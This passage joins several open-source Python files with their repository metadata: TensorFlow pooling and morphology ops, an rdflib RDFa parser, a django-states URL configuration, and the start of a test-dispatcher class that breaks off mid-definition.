each dimension of `value`, currently only supports row and col dimension
and should be >= 1.0. For example, a valid pooling ratio looks like [1.0,
1.44, 1.73, 1.0]. The first and last elements must be 1.0 because we don't
allow pooling on batch and channels dimensions. 1.44 and 1.73 are pooling
ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional max pooling.
deterministic: An optional `bool`. Deprecated; use `fractional_max_pool_v2`
instead.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
seed2: An optional `int`. Deprecated; use `fractional_max_pool_v2` instead.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional max pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
return gen_nn_ops.fractional_max_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic, seed, seed2,
name)
@tf_export("nn.fractional_max_pool", v1=[])
@dispatch.add_dispatch_support
def fractional_max_pool_v2(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
seed=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional max pooling on the input.
Fractional max pooling is slightly different than regular max pooling. In
regular max pooling, you downsize an input set by taking the maximum value of
smaller N x N subsections of the set (often 2x2), and try to reduce the set by
a factor of N, where N is an integer. Fractional max pooling, as you might
expect from the word "fractional", means that the overall reduction ratio N
does not have to be an integer.
The sizes of the pooling regions are generated randomly but are fairly
uniform. For example, let's look at the height dimension, and the constraints
on the list of rows that will be pool boundaries.
First we define the following:
1. input_row_length : the number of rows from the input set
2. output_row_length : which will be smaller than the input
3. alpha = input_row_length / output_row_length : our reduction ratio
4. K = floor(alpha)
5. row_pooling_sequence : this is the result list of pool boundary rows
Then, row_pooling_sequence should satisfy:
1. a[0] = 0 : the first value of the sequence is 0
2. a[end] = input_row_length : the last value of the sequence is the size
3. K <= (a[i+1] - a[i]) <= K+1 : all intervals are K or K+1 size
4. length(row_pooling_sequence) = output_row_length+1
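For example (with illustrative numbers): if `input_row_length = 5` and
`output_row_length = 3`, then `alpha = 5/3` and `K = 1`, so `[0, 2, 4, 5]` is a
valid `row_pooling_sequence`: it starts at 0, ends at 5, every interval has
size 1 or 2, and it contains `output_row_length + 1 = 4` entries.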
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
    pooling_ratio: An int or float, or a list of `ints` or `floats`, that has
      length `1`, `2` or `4`.
Pooling ratio for each dimension of `value`, currently only supports row
and col dimension and should be >= 1.0. For example, a valid pooling ratio
looks like [1.0, 1.44, 1.73, 1.0]. The first and last elements must be 1.0
because we don't allow pooling on batch and channels dimensions. 1.44 and
1.73 are pooling ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check paper (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional max pooling.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional max pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
if (isinstance(pooling_ratio, (list, tuple))):
if (pooling_ratio[0] != 1.0 or pooling_ratio[-1] != 1.0):
raise ValueError(
"The first and last elements of pooling ratio must be 1.0.")
for element in pooling_ratio:
if element < 1.0:
raise ValueError("pooling_ratio should be >= 1.0.")
elif (isinstance(pooling_ratio, (int, float))):
if pooling_ratio < 1.0:
raise ValueError("pooling_ratio should be >= 1.0.")
else:
raise ValueError("pooling_ratio should be an int or a list of ints.")
pooling_ratio = _get_sequence(pooling_ratio, 2, 3, "pooling_ratio")
if seed == 0:
return gen_nn_ops.fractional_max_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=False,
seed=0, seed2=0, name=name)
else:
seed1, seed2 = random_seed.get_seed(seed)
return gen_nn_ops.fractional_max_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=True,
seed=seed1, seed2=seed2, name=name)
@tf_export(v1=["nn.fractional_avg_pool"])
@dispatch.add_dispatch_support
@deprecation.deprecated(date=None, instructions="`seed2` and `deterministic` "
"args are deprecated. Use fractional_avg_pool_v2.")
def fractional_avg_pool(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
deterministic=False,
seed=0,
seed2=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional average pooling on the input.
This is a deprecated version of `fractional_avg_pool`.
Fractional average pooling is similar to Fractional max pooling in the pooling
region generation step. The only difference is that after pooling regions are
generated, a mean operation is performed instead of a max operation in each
pooling region.
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length >= 4. Pooling ratio for
each dimension of `value`, currently only supports row and col dimension
and should be >= 1.0. For example, a valid pooling ratio looks like [1.0,
1.44, 1.73, 1.0]. The first and last elements must be 1.0 because we don't
allow pooling on batch and channels dimensions. 1.44 and 1.73 are pooling
ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check paper (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional avg pooling.
deterministic: An optional `bool`. Deprecated; use `fractional_avg_pool_v2`
instead.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
seed2: An optional `int`. Deprecated; use `fractional_avg_pool_v2` instead.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional avg pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
return gen_nn_ops.fractional_avg_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic, seed, seed2,
name=name)
@tf_export("nn.fractional_avg_pool", v1=[])
@dispatch.add_dispatch_support
def fractional_avg_pool_v2(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
seed=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional average pooling on the input.
Fractional average pooling is similar to Fractional max pooling in the pooling
region generation step. The only difference is that after pooling regions are
generated, a mean operation is performed instead of a max operation in each
pooling region.
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length >= 4. Pooling ratio for
each dimension of `value`, currently only supports row and col dimension
and should be >= 1.0. For example, a valid pooling ratio looks like [1.0,
1.44, 1.73, 1.0]. The first and last elements must be 1.0 because we don't
allow pooling on batch and channels dimensions. 1.44 and 1.73 are pooling
ratio on height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`. When set to `True`,
generates the pooling sequence in a pseudorandom fashion, otherwise, in a
random fashion. Check paper (Graham, 2015) for difference between
pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`. When set to `True`,
it means when pooling, the values at the boundary of adjacent pooling
cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used
twice. The result would be [20, 16] for fractional avg pooling.
seed: An optional `int`. Defaults to `0`. If set to be non-zero, the
random number generator is seeded by the given seed. Otherwise it is
seeded by a random seed.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (`output`, `row_pooling_sequence`,
`col_pooling_sequence`).
output: Output `Tensor` after fractional avg pooling. Has the same type as
`value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
References:
Fractional Max-Pooling:
[Graham, 2015](https://arxiv.org/abs/1412.6071)
([pdf](https://arxiv.org/pdf/1412.6071.pdf))
"""
if seed == 0:
return gen_nn_ops.fractional_avg_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=False,
seed=0, seed2=0, name=name)
else:
seed1, seed2 = random_seed.get_seed(seed)
return gen_nn_ops.fractional_avg_pool(value, pooling_ratio, pseudo_random,
overlapping, deterministic=True,
seed=seed1, seed2=seed2, name=name)
@ops.RegisterStatistics("Dilation2D", "flops")
def _calc_dilation2d_flops(graph, node):
"""Calculates the compute resources needed for Dilation2D."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_height = int(filter_shape[0])
filter_width = int(filter_shape[1])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats("flops", (output_count * filter_height * filter_width * 2))
@tf_export(v1=["nn.erosion2d"])
@dispatch.add_dispatch_support
def erosion2d(value, kernel, strides, rates, padding, name=None):
"""Computes the grayscale erosion of 4-D `value` and 3-D `kernel` tensors.
The `value` tensor has shape `[batch, in_height, in_width, depth]` and the
`kernel` tensor has shape `[kernel_height, kernel_width, depth]`, i.e.,
each input channel is processed independently of the others with its own
structuring function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the
output tensor depend on the `padding` algorithm. We currently only support the
default "NHWC" `data_format`.
In detail, the grayscale morphological 2-D erosion is given by:
output[b, y, x, c] =
min_{dy, dx} value[b,
strides[1] * y - rates[1] * dy,
strides[2] * x - rates[2] * dx,
c] -
kernel[dy, dx, c]
Duality: The erosion of `value` by the `kernel` is equal to the negation of
the dilation of `-value` by the reflected `kernel`.
Args:
value: A `Tensor`. 4-D with shape `[batch, in_height, in_width, depth]`.
kernel: A `Tensor`. Must have the same type as `value`.
3-D with shape `[kernel_height, kernel_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional). If not specified "erosion2d"
is used.
Returns:
A `Tensor`. Has the same type as `value`.
4-D with shape `[batch, out_height, out_width, depth]`.
Raises:
    ValueError: If the `value` depth does not match `kernel`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
"""
with ops.name_scope(name, "erosion2d", [value, kernel]) as name:
# Reduce erosion to dilation by duality.
return math_ops.negative(
gen_nn_ops.dilation2d(
input=math_ops.negative(value),
filter=array_ops.reverse_v2(kernel, [0, 1]),
strides=strides,
rates=rates,
padding=padding,
name=name))
@tf_export("nn.erosion2d", v1=[])
@dispatch.add_dispatch_support
def erosion2d_v2(value,
filters,
strides,
padding,
data_format,
dilations,
name=None):
"""Computes the grayscale erosion of 4-D `value` and 3-D `filters` tensors.
The `value` tensor has shape `[batch, in_height, in_width, depth]` and the
`filters` tensor has shape `[filters_height, filters_width, depth]`, i.e.,
each input channel is processed independently of the others with its own
structuring function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the
output tensor depend on the `padding` algorithm. We currently only support the
default "NHWC" `data_format`.
In detail, the grayscale morphological 2-D erosion is given by:
output[b, y, x, c] =
min_{dy, dx} value[b,
strides[1] * y - dilations[1] * dy,
strides[2] * x - dilations[2] * dx,
c] -
filters[dy, dx, c]
Duality: The erosion of `value` by the `filters` is equal to the negation of
the dilation of `-value` by the reflected `filters`.
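A minimal call sketch (the shapes and values below are illustrative and not
part of the original documentation):
>>> value = tf.zeros([1, 4, 4, 1])
>>> filters = tf.zeros([2, 2, 1])
>>> out = tf.nn.erosion2d(value, filters, strides=[1, 1, 1, 1],
...                       padding="VALID", data_format="NHWC",
...                       dilations=[1, 1, 1, 1])
>>> out.shape.as_list()
[1, 3, 3, 1]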
Args:
value: A `Tensor`. 4-D with shape `[batch, in_height, in_width, depth]`.
filters: A `Tensor`. Must have the same type as `value`.
3-D with shape `[filters_height, filters_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: A `string`, only `"NHWC"` is currently supported.
dilations: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
name: A name for the operation (optional). If not specified "erosion2d"
is used.
Returns:
A `Tensor`. Has the same type as `value`.
4-D with shape `[batch, out_height, out_width, depth]`.
Raises:
ValueError: If the `value` depth does not match `filters`' shape, or if
padding is other than `'VALID'` or `'SAME'`.
"""
if data_format != "NHWC":
raise ValueError("Data formats other than NHWC are not yet supported")
with ops.name_scope(name, "erosion2d", [value, filters]) as name:
# Reduce erosion to dilation by duality.
return math_ops.negative(
gen_nn_ops.dilation2d(
input=math_ops.negative(value),
filter=array_ops.reverse_v2(filters, [0, 1]),
strides=strides,
rates=dilations,
padding=padding,
name=name))
@tf_export(v1=["math.in_top_k", "nn.in_top_k"])
@dispatch.add_dispatch_support
def in_top_k(predictions, targets, k, name=None):
r"""Says whether the targets are in the top `K` predictions.
This outputs a `batch_size` bool array: an entry `out[i]` is `true` if the
prediction for the target class is finite (not inf, -inf, or nan) and is
among the top `k` predictions for example `i`. Note that the
behavior of `InTopK` differs from the `TopK` op in its handling of ties; if
multiple classes have the same prediction value and straddle the top-`k`
boundary, all of those classes are considered to be in the top `k`.
More formally, let
\\(predictions_i\\) be the predictions for all classes for example `i`,
\\(targets_i\\) be the target class for example `i`,
\\(out_i\\) be the output for example `i`,
$$out_i = predictions_{i, targets_i} \in TopKIncludingTies(predictions_i)$$
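For example (with illustrative values): if `predictions = [[0.1, 0.9, 0.4],
[0.4, 0.2, 0.9]]`, `targets = [1, 0]` and `k = 1`, the result is
`[True, False]`: the target class of the first example holds the largest
prediction, while the target class of the second example does not.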
Args:
predictions: A `Tensor` of type `float32`.
A `batch_size` x `classes` tensor.
targets: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A `batch_size` vector of class ids.
k: An `int`. Number of top elements to look at for computing precision.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`. Computed Precision at `k` as a `bool Tensor`.
"""
with ops.name_scope(name, "in_top_k"):
return gen_nn_ops.in_top_kv2(predictions, targets, k, name=name)
@tf_export("math.in_top_k", "nn.in_top_k", v1=[])
@dispatch.add_dispatch_support
def in_top_k_v2(targets, predictions, k, name=None):
return in_top_k(predictions, targets, k, name)
in_top_k_v2.__doc__ = in_top_k.__doc__
tf_export(v1=["nn.quantized_avg_pool"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_avg_pool))
tf_export(v1=["nn.quantized_conv2d"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_conv2d))
tf_export(v1=["nn.quantized_relu_x"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_relu_x))
tf_export(v1=["nn.quantized_max_pool"])(
dispatch.add_dispatch_support(gen_nn_ops.quantized_max_pool))
@tf_export("nn.isotonic_regression", v1=[])
@dispatch.add_dispatch_support
def isotonic_regression(inputs, decreasing=True, axis=-1):
r"""Solves isotonic regression problems along the given axis.
For each vector x, the problem solved is
$$\argmin_{y_1 >= y_2 >= ... >= y_n} \sum_i (x_i - y_i)^2.$$
As the solution is component-wise constant, a second tensor is returned that
encodes the segments. The problems are solved over the given axis.
Consider the following example, where we solve a batch of two problems. The
first input is [3, 1, 2], while the second is [1, 3, 4] (as the axis is 1).
>>> x = tf.constant([[3, 1, 2], [1, 3, 4]], dtype=tf.float32)
>>> y, segments = tf.nn.isotonic_regression(x, axis=1)
>>> y # The solution.
<tf.Tensor: shape=(2, 3), dtype=float32, numpy=
array([[3. , 1.5 , 1.5 ],
[2.6666667, 2.6666667, 2.6666667]], dtype=float32)>
Note that the first solution has two blocks [3] and [1.5, 1.5]. The second
solution is constant, and thus has a single segment. These segments are
exactly what the second returned tensor encodes:
>>> segments
<tf.Tensor: shape=(2, 3), dtype=int32, numpy=
array([[0, 1, 1],
[0, 0, 0]], dtype=int32)>
Args:
inputs: A tensor holding the inputs.
    decreasing: If set to False, the inequalities in the optimization constraints
are flipped.
axis: The axis along which the problems should be solved.
Returns:
    output: The solutions, same shape and type as the input.
segments: An int32 tensor, same shape as the input indicating the segments
that have the same value. Specifically, those positions that have the same
value correspond to the same segment. These values start at zero, and are
      monotonically increasing for each solution.
"""
type_promotions = {
# Float types get mapped to themselves, int8/16 to float32, rest to double
dtypes.float32:
dtypes.float32,
dtypes.half:
dtypes.half,
dtypes.bfloat16:
dtypes.bfloat16,
dtypes.int8:
dtypes.float32,
dtypes.int16:
dtypes.float32,
}
inputs = ops.convert_to_tensor(inputs)
try:
output_dtype = type_promotions[inputs.dtype]
except KeyError:
output_dtype = dtypes.float64
def compute_on_matrix(matrix, name=None):
iso_fn = functools.partial(
gen_nn_ops.isotonic_regression, output_dtype=output_dtype, name=name)
if decreasing:
return iso_fn(matrix)
else:
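      # An increasing fit is obtained by negating the input, solving the
      # decreasing problem, and negating the solution back.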
output, segments = iso_fn(-matrix)
return -output, segments
return _wrap_2d_function(inputs, compute_on_matrix, axis)
| {
"content_hash": "99b4a6e5ea504bdc7cf7850605155ba1",
"timestamp": "",
"source": "github",
"line_count": 6025,
"max_line_length": 116,
"avg_line_length": 40.55668049792531,
"alnum_prop": 0.653969241346571,
"repo_name": "sarvex/tensorflow",
"id": "3b1c3539eb989f6d05366ce54754c9d19f2c1c7b",
"size": "245043",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tensorflow/python/ops/nn_ops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "148184"
},
{
"name": "C++",
"bytes": "6224499"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "650478"
},
{
"name": "Java",
"bytes": "53519"
},
{
"name": "JavaScript",
"bytes": "6659"
},
{
"name": "Jupyter Notebook",
"bytes": "777935"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "61743"
},
{
"name": "Python",
"bytes": "3474762"
},
{
"name": "Shell",
"bytes": "45640"
},
{
"name": "TypeScript",
"bytes": "283668"
}
],
"symlink_target": ""
} |
"""
The core parsing function of RDFa. Some details are
put into other modules to make them easier to update/modify (e.g., generation of literals, or managing the current state).
@summary: RDFa core parser processing step
@requires: U{RDFLib package<http://rdflib.net>}
@organization: U{World Wide Web Consortium<http://www.w3.org>}
@author: U{Ivan Herman<http://www.w3.org/People/Ivan/>}
@license: This software is available for use under the
U{W3C® SOFTWARE NOTICE AND LICENSE<http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231>}
"""
from rdflib.term import BNode, URIRef
from rdflib.namespace import RDF
from rdflib.plugins.parsers.rdfa.state import ExecutionContext
from rdflib.plugins.parsers.rdfa.literal import generate_literal
from rdflib.plugins.parsers.rdfa.embeddedrdf import handle_embeddedRDF
from rdflib.plugins.parsers.rdfa.options import GENERIC_XML, XHTML_RDFA, HTML5_RDFA
__all__ = ['parse_one_node']
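# A minimal usage sketch (the names below are illustrative and not defined in
# this module): given a parsed DOM document `dom`, an RDFLib `graph`, a
# top-level ExecutionContext `state` and a subject node `subject`, the
# recursive parsing is kicked off with:
#   parse_one_node(dom.documentElement, graph, subject, state, [])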
def parse_one_node(node, graph, parent_object, incoming_state, parent_incomplete_triples):
"""The (recursive) step of handling a single node. See the
U{RDFa syntax document<http://www.w3.org/TR/rdfa-syntax>} for further details.
@param node: the DOM node to handle
@param graph: the RDF graph
@type graph: RDFLib's Graph object instance
@param parent_object: the parent's object, as an RDFLib URIRef
@param incoming_state: the inherited state (namespaces, lang, etc)
@type incoming_state: L{State.ExecutionContext}
@param parent_incomplete_triples: list of hanging triples (the missing resource set to None) to be handled (or not)
by the current node.
    @return: whether the caller has to complete its parent's incomplete triples
@rtype: Boolean
"""
def _get_resources_for_attr(attr):
"""Get a series of resources encoded via CURIE-s for an attribute on a specific node.
@param attr: the name of the attribute
@return: a list of RDFLib URIRef instances
"""
if not node.hasAttribute(attr):
return []
else:
rel = (attr == "rel") or (attr == "rev")
prop = (attr == "property")
return state.get_resources(node.getAttribute(attr), rel, prop)
# Update the state. This means, for example, the possible local settings of
# namespaces and lang
state = ExecutionContext(node, graph, inherited_state=incoming_state)
#---------------------------------------------------------------------------------
# Handle the special case for embedded RDF, eg, in SVG1.2.
    # This may add some triples to the target graph that do not originate from RDFa parsing
    # If the function returns True, that means that an rdf:RDF element has been found. No
# RDFa parsing should be done on that subtree, so we simply return...
if state.options.host_language == GENERIC_XML and node.nodeType == node.ELEMENT_NODE and handle_embeddedRDF(node, graph, state):
return
#---------------------------------------------------------------------------------
# First, let us check whether there is anything to do at all. Ie,
# whether there is any relevant RDFa specific attribute on the element
#
if not _has_one_of_attributes(node, "href", "resource", "about", "property", "rel", "rev", "typeof", "src"):
# nop, there is nothing to do here, just go down the tree and return...
for n in node.childNodes:
if n.nodeType == node.ELEMENT_NODE : parse_one_node(n, graph, parent_object, state, parent_incomplete_triples)
return
#-----------------------------------------------------------------
# The goal is to establish the subject and object for local processing
    # The behaviour is slightly different depending on the presence or absence
# of the @rel/@rev attributes
current_subject = None
current_object = None
if _has_one_of_attributes(node, "rel", "rev"):
# in this case there is the notion of 'left' and 'right' of @rel/@rev
# in establishing the new Subject and the objectResource
# set first the subject
if node.hasAttribute("about"):
current_subject = state.get_Curie_ref(node.getAttribute("about"))
elif node.hasAttribute("src"):
current_subject = state.get_URI_ref(node.getAttribute("src"))
elif node.hasAttribute("typeof"):
current_subject = BNode()
# get_URI_ref may return None in case of an illegal Curie, so
# we have to be careful here, not use only an 'else'
if current_subject == None:
current_subject = parent_object
# set the object resource
if node.hasAttribute("resource"):
current_object = state.get_Curie_ref(node.getAttribute("resource"))
elif node.hasAttribute("href"):
current_object = state.get_URI_ref(node.getAttribute("href"))
else:
# in this case all the various 'resource' setting attributes
        # behave identically, except that their values might differ in terms of
        # CURIE-s, and they also have their own priority, of course
if node.hasAttribute("about"):
current_subject = state.get_Curie_ref(node.getAttribute("about"))
elif node.hasAttribute("src"):
current_subject = state.get_URI_ref(node.getAttribute("src"))
elif node.hasAttribute("resource"):
current_subject = state.get_Curie_ref(node.getAttribute("resource"))
elif node.hasAttribute("href"):
current_subject = state.get_URI_ref(node.getAttribute("href"))
elif node.hasAttribute("typeof"):
current_subject = BNode()
# get_URI_ref may return None in case of an illegal Curie, so
# we have to be careful here, not use only an 'else'
if current_subject == None:
current_subject = parent_object
# in this case no non-literal triples will be generated, so the
# only role of the current_objectResource is to be transferred to
# the children node
current_object = current_subject
# ---------------------------------------------------------------------
# The possible typeof indicates a number of type statements on the newSubject
for defined_type in _get_resources_for_attr("typeof"):
graph.add((current_subject, RDF.type, defined_type))
# ---------------------------------------------------------------------
# In case of @rel/@rev, either triples or incomplete triples are generated
# the (possible) incomplete triples are collected, to be forwarded to the children
incomplete_triples = []
for prop in _get_resources_for_attr("rel"):
theTriple = (current_subject, prop, current_object)
if current_object != None:
graph.add(theTriple)
else:
incomplete_triples.append(theTriple)
for prop in _get_resources_for_attr("rev"):
theTriple = (current_object, prop, current_subject)
if current_object != None:
graph.add(theTriple)
else:
incomplete_triples.append(theTriple)
# ----------------------------------------------------------------------
# Generation of the literal values. The newSubject is the subject
# A particularity of property is that it stops the parsing down the DOM tree if an XML Literal is generated,
# because everything down there is part of the generated literal. For this purpose the recurse flag is set (and used later
# in the parsing process).
if node.hasAttribute("property"):
        # Generate the literal. It has been put into a separate module to make it more manageable
# the overall return value should be set to true if any valid triple has been generated
recurse = generate_literal(node, graph, current_subject, state)
else:
recurse = True
# ----------------------------------------------------------------------
# Setting the current object to a bnode is setting up a possible resource
# for the incomplete triples downwards
if current_object == None:
object_to_children = BNode()
else:
object_to_children = current_object
#-----------------------------------------------------------------------
# Here is the recursion step for all the children
if recurse:
for n in node.childNodes:
if n.nodeType == node.ELEMENT_NODE:
parse_one_node(n, graph, object_to_children, state, incomplete_triples)
# ---------------------------------------------------------------------
# At this point, the parent's incomplete triples may be completed
for s, p, o in parent_incomplete_triples:
if s == None: s = current_subject
if o == None: o = current_subject
graph.add((s, p, o))
# -------------------------------------------------------------------
# This should be it...
# -------------------------------------------------------------------
return
def _has_one_of_attributes(node, *args):
"""
Check whether one of the listed attributes is present on a (DOM) node.
@param node: DOM element node
@param args: possible attribute names
@return: True or False
@rtype: Boolean
"""
return True in [ node.hasAttribute(attr) for attr in args ]
| {
"content_hash": "6493146f1fb9dfc2c268c1e425bb47ac",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 132,
"avg_line_length": 47.03517587939699,
"alnum_prop": 0.6112179487179488,
"repo_name": "Letractively/rdflib",
"id": "d5b411fe199697f03cb985511485a5e15f7ae7f1",
"size": "9385",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdflib/plugins/parsers/rdfa/parse.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "119350"
},
{
"name": "Python",
"bytes": "588422"
},
{
"name": "Shell",
"bytes": "394"
}
],
"symlink_target": ""
} |
from django.conf.urls import url
from django.views.generic.base import RedirectView
from states.views import state_action_confirm, state_action, state_action_ajax, report, state_history
urlpatterns = [
url(r'^action/confirm/(?P<state_pk>\d+)/(?P<action>.*)/noparam/$', state_action_confirm, {'next': 'state_action_noparam'}, name='state_action_confirm_noparam'),
url(r'^action/confirm/(?P<state_pk>\d+)/(?P<action>.*)/$', state_action_confirm, name='state_action_confirm'),
url(r'^action/(?P<state_pk>\d+)/(?P<action>.*)/noparam/$', state_action, {'no_param': True}, name='state_action_noparam'),
url(r'^action/(?P<state_pk>\d+)/(?P<action>.*)/$', state_action, name='state_action'),
url(r'^ajax/action/$', state_action_ajax, name='state_action_ajax'),
url(r'^history/$', state_history, name='states_state_history'),
url(r'^(?P<content_type>[a-z\._\d+]+)/reports/$', RedirectView.as_view(url='-1/'), name='states_overview'),
url(r'^(?P<content_type>[a-z\._\d+]+)/reports/(?P<report_id>-?\d+)/$', report, name='states_report'),
url(r'^(?P<content_type>[\d+]+)/reports/(?P<report_id>-?\d+)/order_by/(?P<order_column>-?\d+)/(?P<order_direction>[AD])/$', report, name='states_report_order_by'),
]
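# Usage sketch (illustrative; assumes this urlconf is included at the project
# root and that `reverse` is imported, e.g. from `django.urls`):
#   reverse('state_action', kwargs={'state_pk': 1, 'action': 'approve'})
#   # -> '/action/1/approve/'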
| {
"content_hash": "bf9be7ee9f82fcd788bf056dcbfce686",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 167,
"avg_line_length": 77,
"alnum_prop": 0.6436688311688312,
"repo_name": "vikingco/django-states",
"id": "dccf81a21fadab7304d46b85672e4f6e4aa50e31",
"size": "1232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/states/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9290"
},
{
"name": "Python",
"bytes": "174008"
},
{
"name": "SourcePawn",
"bytes": "204"
}
],
"symlink_target": ""
} |
import logging
from collections import deque
from satori.core.checking.accumulators import accumulators
from satori.core.checking.reporters import reporters
from satori.core.models import Test, TestMapping
class DispatcherBase(object):
def __init__(self, supervisor, test_suite_result):
super(DispatcherBase, self).__init__()
self.supervisor = supervisor
self.test_suite_result = test_suite_result
if test_suite_result.test_suite.accumulators:
accumulator_list = test_suite_result.test_suite.accumulators.split(',')
else:
accumulator_list = []
self.accumulators = [
accumulators[accumulator](test_suite_result) for accumulator in accumulator_list
]
self.reporter = reporters[test_suite_result.test_suite.reporter](test_suite_result)
def init(self):
for accumulator in self.accumulators:
accumulator.init()
self.reporter.init()
def checked_test_results(self, test_results):
raise NotImplementedError
def accumulate(self, test_result):
for accumulator in self.accumulators:
accumulator.accumulate(test_result)
self.reporter.accumulate(test_result)
def status(self):
return all(accumulator.status() for accumulator in self.accumulators) and self.reporter.status()
def finish(self):
